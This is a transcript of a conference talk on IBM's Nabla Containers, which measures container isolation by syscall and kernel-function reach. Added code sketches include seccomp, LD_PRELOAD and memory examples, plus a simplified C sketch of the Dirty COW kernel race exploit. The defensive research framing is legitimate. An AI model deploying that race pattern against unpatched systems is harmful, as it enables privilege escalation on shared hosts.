Hi, my name is Brandon. I'm from IBM Research, from the container cloud team, and I'm going to present something we are working on. We call it Nabla Containers. So this is the Nabla Containers logo; if you are wondering, the reason we chose it is because it kind of resembles the architecture that you'll see later.

So the conventional wisdom today is that people don't believe containers are secure. They will run multi-tenancy with virtual machines, but they don't want to do the same with containers. In research, we thought about this a little bit, and we wanted to dive a little deeper and ask: why do people have this mindset about containers versus VMs? How exactly do we want to define isolation, and how does that metric compare against both VMs and containers? And after we figure out what makes people think VM workloads are isolated, can we figure out how to bring that isolation to containers as well? So I'm going to go through a really quick introduction to our threat model for isolation, and then I'll do a short demo of our open source runtime, runnc, which runs Nabla containers.

All right. So how we define isolation is that a workload should not be able to access the data or secrets of a co-located workload or container on the same host. A quick example: we have service A over here, and service A has a secret or some data. An attacker that runs another container on the same host should not be able to access that secret. So why is this important? For us, one of the use cases is, for example: I have service A over here that has gone through a lot of vetting and audits, it's a really secure service, but I also have a legacy 30-year-old application with tons of vulnerabilities. An attacker may use that to do a horizontal attack on the same host.

So what does container isolation look like right now? Containers are namespaced processes. Namespacing is good, because by definition it means that the data of one container should not be retrievable from another process. But because containers are namespaced processes, they are also processes, and so any vulnerabilities or exploits that apply to regular Linux processes will most likely apply to containers as well. So the real threat that we are trying to address here is what we call the horizontal attack profile: two containers on the same host, where one attacks the other through the shared privileged component, which in our case is the kernel.

So to see what we're up against, let's take a really brief look at an exploit. This was the Dirty COW CVE from 2016 (CVE-2016-5195); it was quite a popular one. What happened was that this exploit revolved around a race condition in the kernel's copy-on-write handling. What it did was mmap a read-only page, create one thread that kept calling madvise(MADV_DONTNEED), and another thread that kept writing to that mapping through /proc/self/mem. So what the exploit is really doing is exercising multiple kernel functions, through ordinary syscalls, to trigger the race condition. I'll show a rough sketch of that pattern in a moment.

So to understand how we are measuring isolation, let's take a deeper look at what the kernel looks like. The kernel, to us, is just a bunch of functions, right? The kernel is just code. And the way we're modeling it is: what we saw the exploit doing was exercising system calls to exercise kernel code within the kernel. So in this case we have the application on top, everything outside the green box is user space, and we have the system call interface into the kernel.
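To make that concrete, here is a rough, simplified sketch of the Dirty COW pattern just described. This is my illustration of the publicly documented PoC structure, not code from the talk; the kernel was patched in 2016, so today it does nothing beyond exercising the syscalls (mmap, madvise, lseek, write) that the speaker is talking about.

```c
/* Sketch of the Dirty COW (CVE-2016-5195) race pattern: one thread keeps
 * discarding a private read-only mapping with madvise(MADV_DONTNEED) while
 * another keeps writing to the same address through /proc/self/mem. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <pthread.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

static void *map;
static size_t len;

static void *madvise_loop(void *arg) {
    (void)arg;
    for (int i = 0; i < 1000000; i++)
        madvise(map, len, MADV_DONTNEED);   /* keep throwing the mapping away */
    return NULL;
}

static void *write_loop(void *arg) {
    (void)arg;
    int mem = open("/proc/self/mem", O_RDWR);
    for (int i = 0; i < 1000000; i++) {
        lseek(mem, (off_t)(uintptr_t)map, SEEK_SET);
        write(mem, "x", 1);                 /* write "through" the read-only mapping */
    }
    close(mem);
    return NULL;
}

int main(int argc, char **argv) {
    if (argc < 2) return 1;
    int fd = open(argv[1], O_RDONLY);       /* a file we only have read access to */
    if (fd < 0) return 1;
    struct stat st;
    fstat(fd, &st);
    len = (size_t)st.st_size;
    map = mmap(NULL, len, PROT_READ, MAP_PRIVATE, fd, 0);  /* private, copy-on-write */

    pthread_t t1, t2;                       /* the two racing threads */
    pthread_create(&t1, NULL, madvise_loop, NULL);
    pthread_create(&t2, NULL, write_loop, NULL);
    pthread_join(t1, NULL);
    pthread_join(t2, NULL);
    return 0;
}
```

Note that everything here is a perfectly ordinary syscall that a default container is allowed to make, which is exactly the point the talk is building toward.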
So, back to the model. Every box you see here, you can think of as a kernel function. And out of all the kernel functions in the kernel, there will be some that have vulnerabilities; we mark those as the red boxes. The hypothesis that we went with is that if we restrict the set of system calls that interface into the kernel, we restrict the number of kernel functions that are reachable, and hopefully we prevent some of the red boxes from being reachable. So we have fewer reachable vulnerabilities and therefore, potentially, fewer exploits.

So great, this has been done, right? Everyone knows seccomp. Docker has a default seccomp policy; I believe it blocks at least 44 system calls. And what it is doing is exactly what we're thinking of: it's preventing access to certain kernel functions. If we treat the boxes that are grayed out as kernel functions that are no longer reachable, we can see them as basically removed from the kernel itself. The issue with seccomp policies is that it's often difficult to create a policy that is both generic and secure. So that's one of the problems. There's another approach to this, which is syscall profiling. This is done by several companies like Aqua and Twistlock, and what they're doing is running a bunch of tests, or running the container multiple times, to find the seccomp profile that they can use.

So our approach is something called Nabla. What we are providing is a deterministic and generic seccomp policy for applications that limits them to only seven system calls, and the way we're doing this is with library OS techniques. The general gist is that we take a lot of the functionality in the kernel, for example the TCP/IP stack, and we bring it up into user space. Take the TCP/IP stack as the example: there's a lot of code in there, but a lot of it is implementing sliding windows, deciding where a packet should go, and things like that. You don't have to run that code in the kernel; there's no real reason to, maybe besides performance. So the question is: can we lift this up into user space? And that's exactly what we're doing. We take the TCP stack, some parts of the file system, and we bring them up into a library operating system. You can think of it as taking all that functionality and sticking it in a libc, so that all of those functions run within user space, and only when you actually have to talk to the kernel, when you have to write a packet or something, do we trap into the kernel. That's mainly what the seven syscalls are doing. I'll show below what a seccomp allow-list that tight might look like.

So the approach here is that we are using these concepts from unikernels, and eventually the way we see it, the kernel is going to become like a microkernel; it's going to get smaller and smaller. So we've done this, and I mentioned unikernels already. All of this is based on work from Rumprun and Solo5, which come from the unikernel community. There was a talk on this in the microkernel track; if you can go back in time about an hour, it's there. If not, we have a paper on this. The main gist of it is that we took the unikernels, and we had this thing called the Solo5 interface, which looked kind of like a VM interface.
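As a hedged illustration of that idea, here is a minimal seccomp allow-list using libseccomp. The talk doesn't enumerate the seven syscalls, so the set below is my assumption, roughly the set described in the Nabla containers write-ups; the point is simply how narrow the kernel interface becomes once the library OS handles everything else in user space.

```c
/* Minimal allow-list seccomp filter: kill the process on any syscall outside
 * the (assumed) seven that a Nabla-style workload needs.
 * Build with: gcc allowlist.c -lseccomp */
#include <seccomp.h>
#include <unistd.h>

int main(void) {
    /* Default action: kill on any syscall not explicitly allowed below. */
    scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_KILL);
    if (!ctx) return 1;

    int allowed[] = {
        SCMP_SYS(read),     SCMP_SYS(write),  SCMP_SYS(pread64),
        SCMP_SYS(pwrite64), SCMP_SYS(ppoll),  SCMP_SYS(clock_gettime),
        SCMP_SYS(exit_group),
    };
    for (int i = 0; i < (int)(sizeof(allowed) / sizeof(allowed[0])); i++)
        if (seccomp_rule_add(ctx, SCMP_ACT_ALLOW, allowed[i], 0) < 0)
            return 1;

    if (seccomp_load(ctx) < 0) return 1;

    /* From here on, anything outside the allow-list terminates the process. */
    const char msg[] = "running under a 7-syscall policy\n";
    write(STDOUT_FILENO, msg, sizeof(msg) - 1);
    return 0;
}
```

Compare this with the dozens of syscalls a stock container needs (mmap, madvise, open, ...), which is what makes a generic-but-tight policy so hard for ordinary containers.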
And what we were able to do is run that interface as a process with only seven syscalls. What this meant was, first, that we don't have to use virtualization, we don't have to use VT, and we get a lot of performance benefits because we don't have that additional layer; memory density in particular improves by a lot.

So what we've done is make the modifications needed to run this. We have a runtime called runnc. It's an OCI runtime, sitting at this level, so it's a replacement for runc. The only difference is that the Nabla binaries are not traditional native binaries; they have special requirements. So what we have now is a custom build process, because we statically link against our library operating system: we take the application and rebuild it with this library OS. Right now everything is statically linked, but we believe it is possible to eventually decouple that into a dynamic library, and in that case we may not even have to recompile the binary.

All right, I'm going to do a quick demo to show what's inside a Nabla binary, as well as running it with Docker. We have this repository here, we call it nabla-demo-apps, and it contains a bunch of different applications that we have built. If we take a look at one of them, this one is a node-express app. We have two Dockerfiles here, one for the legacy build and one for the Nabla build, to build the two different types of containers. Before we get to building, let's look at what the app is actually like. It's your standard, very simple Node.js application: you have your app.js and your package.json, basically a standard Node.js application. And this is the original Dockerfile, how you build a regular container: pretty straightforward, copy the application files in and do an npm install. Now let's look at what is in the Dockerfile for a Nabla container. Because we do the rebuilding, there is an additional step, and we use a separate binary. So it's pretty much the same thing, we create the node application and run npm install, but instead we use a base image we call the Nabla node base. That base image is just an empty image with only the node binary in it, the Nabla node binary. So the takeaway from the differences between the two Dockerfiles is that if you look at the file system as a whole, it's going to be exactly the same, except that the binary in the two file systems will be different. So I'm just going to build it really quickly.

What we're going to do next is look at the syscall interface and how it interfaces with the kernel. We'll start with the regular container. So we run the node-express container, like so, we grab the IP and the PID, and what we're going to do now is strace this process while we make a bunch of calls against it. All right, so after all those calls, we can take a look at what would be at least the minimum seccomp profile needed for a regular node application. Within the past 20 seconds, these are all the system calls that have been made by the node application. What we are really interested in here is not so much how many times each syscall was made, but the length of the list.
If an attacker is able to compromise the service, they would be able to call any of these, in any way they like. So if we look over here, we have mmap, we have madvise, and we have read and open. So pretty much, even if you protected a Node.js application like this with the strictest seccomp policy, well, not the strictest, but a reasonable seccomp policy, you would still be able to perform something like the Dirty COW attack.

I'm now going to do the same thing with the Nabla container. I just add this additional argument, --runtime=runnc, and we run the node-express Nabla image. So now it's running the same application, but in our initialization code we print a bunch of statements, and you can see that the components here are part of the unikernel ecosystem we're using: the Solo5 interface, and Rumprun, which is a NetBSD rump kernel, as our library operating system. We do the same thing with the Nabla container, and we see that it only used three out of the seven syscalls. Basically it's just waiting on a socket and reading and writing packets whenever it has to. All that TCP stack, everything else, is done in user space.

All right, so just really quickly: what we saw is where strace sits, so we were measuring the syscall interface going into the kernel. The graph on the left shows a comparison, with regular Docker containers in red and Nabla in blue. We ran this for Node Express, Redis, and Python Tornado. That's a really high-level view of it. Then we went a little deeper: we measured the actual kernel functions exercised, using the ftrace utility, and we saw a similar trend. The second graph over here on the right shows the difference in the ftrace measurements.

So I'm just going to touch on this really quickly so we can get to questions. Something we noticed when we were running experiments is that for certain measurements, Nabla was actually doing a little better than some virtualization technologies. And so we asked ourselves: have we achieved something here? We wrote a paper about this. I won't go into too much detail because it's a talk on its own, but you can read the paper. Basically, the contribution we are making is that you really gain isolation from the interface, the width of the interface, and the implementation of what's underneath, rather than from using VT itself. So we're saying these are two different ideas, and they can be separated instead of always being coupled together.

So this is still a fairly new project, and we have multiple repositories: runnc, which is the actual OCI runtime itself; nabla-demo-apps, where you can look at different applications in different languages; and there are also Rumprun and Solo5, which are really the meat of the unikernel layer. We also want to get some feedback on what other people think about the metric: are there other ideas about how to measure isolation? This obviously isn't the only way to measure isolation, because you have things like Spectre and Meltdown, which are not accounted for in this metric. So there's still a lot of exploration we have to do. If not, this is the end of my talk. Thank you very much.

Thanks for the talk.
Can you comment on how your approach differs from gVisor from Google? Yes, so we actually wrote a blog post about this, but I'm just going to show you a picture. The approach that gVisor takes is, wait, let's see, that's the side-by-side picture, okay. So this picture summarizes gVisor and Nabla side by side. Part of the gVisor philosophy is that there is a layer of guarding between the process itself and the library OS, and another layer of guarding between the library OS and the kernel itself. In the Nabla approach, the process and the library operating system are currently coupled together as one, and what we focus on is really securing this interface. There's nothing to say that we can't do what gVisor is doing, but our main focus is making this interface as small as possible. We have measurements against gVisor as well that I could show, but I think you can see them on the blog; I think it's a lot clearer there. And yeah, feel free to look at the blog, it's the Nabla containers blog; we have a bunch of information about the gVisor comparison as well as the Kata Containers analysis.

Any other questions? In order to remove the necessity to rebuild the binaries, would injecting the library using LD_PRELOAD and replacing the standard C library work, as long as you still have the syscall filtering? So, if the library were dynamically loaded, I think you could do it, as long as you have control over the loader at least. If you had the loader, and you basically hijacked the start command, I think that would be okay. There's also another thing, which is that currently our library operating system is a NetBSD library operating system. So for Linux compatibility, either we need an additional layer that does translation, or we need to use something like LKL, which is a Linux library operating system. But like you said, once you have it as a dynamic library, I think LD_PRELOAD is pretty much something we could do.

Actually, I can answer this question, because I was contributing to a project that does exactly that: modifying library calls using LD_PRELOAD. The project is Scratchbox 2, which is used by the Mer project and Sailfish OS to emulate cross-compiling, without giving the process the impression that it's cross-compiling. But the problem with this approach is that it's very fragile. If you take glibc, it has tons of library functions and you need to replace all of them, because it doesn't have the system call interface in a separate library. So if you replace open, for example, you also have to replace fopen, popen, and so on. It ends up very fragile. Scratchbox 2 works, but there are still many, many problems with this approach. If the system calls were separated into a library separate from glibc, it would be much simpler, but that's not the case.

Yeah, so we actually did an experiment where we only wanted to move the TCP/IP stack, and that gave us problems, because it depends on a different part of the kernel, and then we would have to expose more things. So I think that's similar to the issue you're talking about. In our case, what we're doing is forcing our libc onto the application, so in that sense we assume that all system calls go through our library operating system. In that case, it's a bit more relaxed for us. There's a rough sketch of that LD_PRELOAD-style interposition below.
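As a hedged sketch of what was just discussed (my own illustration, not code from the talk or from Scratchbox 2): an LD_PRELOAD shim that interposes a single libc function. It also hints at why the approach gets fragile, since fopen, popen, openat and friends would each need their own wrapper.

```c
/* Hypothetical interposer: build as a shared object and load it with
 * LD_PRELOAD to intercept open() before glibc's version.
 * Build:  gcc -shared -fPIC -o shim.so shim.c -ldl
 * Use:    LD_PRELOAD=./shim.so ls /etc */
#define _GNU_SOURCE
#include <dlfcn.h>
#include <fcntl.h>
#include <stdarg.h>
#include <stdio.h>
#include <sys/types.h>

typedef int (*open_fn)(const char *, int, ...);

int open(const char *path, int flags, ...) {
    mode_t mode = 0;
    if (flags & O_CREAT) {            /* the mode argument only exists with O_CREAT */
        va_list ap;
        va_start(ap, flags);
        mode = va_arg(ap, mode_t);
        va_end(ap);
    }
    fprintf(stderr, "[shim] open(%s)\n", path);

    /* Forward to the real libc implementation. */
    open_fn real_open = (open_fn)dlsym(RTLD_NEXT, "open");
    return real_open(path, flags, mode);
}
```

The fragility the questioner describes shows up immediately: this only catches callers that go through open(); anything calling fopen(), openat(), or issuing the syscall directly slips past the shim.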
Yeah, I think we have one question. Yeah, yeah. So, are these Nabla binaries a special type of binary? Can we only run them inside these containers with your runtime, or can we run them on the host as well, for debugging or whatever purposes? Right now it runs on, okay, let me just show you a picture. This is actually what the Nabla binary looks like: in the middle is this thing called Solo5, which is an interface that originally was for unikernels. Well, it still is. And below that are the tenders, so this can run on multiple things. Solo5 actually has multiple options for the backend tenders, so you can run this on KVM as well. So you can also run this like unikernels as a service, on VMs.

Hi, thanks for your talk. I have a question: how do you avoid calling mmap if the application requests more memory? So yeah, right now the interface is very VM-like. What happens is that when we allocate, in runnc we get the memory requirement, and basically we say: we're going to create a unikernel with this much space. So we give that chunk of memory to the unikernel and it does its own memory allocation within itself. We kind of take advantage of the idea that if you specify a large amount of memory, it's not all going to be used, it's going to be overcommitted anyway. I'll put a rough sketch of that idea below.

Time for one more question. No, that's it. Thank you. Thanks.
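A minimal sketch of that memory model, assuming the general scheme described in the answer: reserve the guest's whole memory once with a single mmap at container start, then allocate within it purely in user space. The names (guest_mem_init, guest_alloc) are my own illustration, not runnc code.

```c
/* Pre-reserve the unikernel's memory once, then bump-allocate inside it,
 * so the running workload never needs another mmap syscall. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <sys/mman.h>

static uint8_t *region;      /* start of the pre-reserved guest memory */
static size_t   region_size; /* total size requested at container start */
static size_t   used;        /* bump pointer */

int guest_mem_init(size_t size) {
    region = mmap(NULL, size, PROT_READ | PROT_WRITE,
                  MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);   /* the one mmap */
    if (region == MAP_FAILED) return -1;
    region_size = size;
    used = 0;
    return 0;
}

/* Allocation inside the guest: pure user-space bookkeeping, no syscall. */
void *guest_alloc(size_t n) {
    n = (n + 15) & ~(size_t)15;          /* 16-byte alignment */
    if (used + n > region_size) return NULL;
    void *p = region + used;
    used += n;
    return p;
}

int main(void) {
    if (guest_mem_init(64 * 1024 * 1024) != 0) return 1;  /* "VM size" up front */
    void *buf = guest_alloc(4096);
    printf("allocated 4 KiB at %p without a further mmap\n", buf);
    return 0;
}
```

Overcommit is what makes the up-front reservation cheap: anonymous pages that the guest never touches are never actually backed by physical memory.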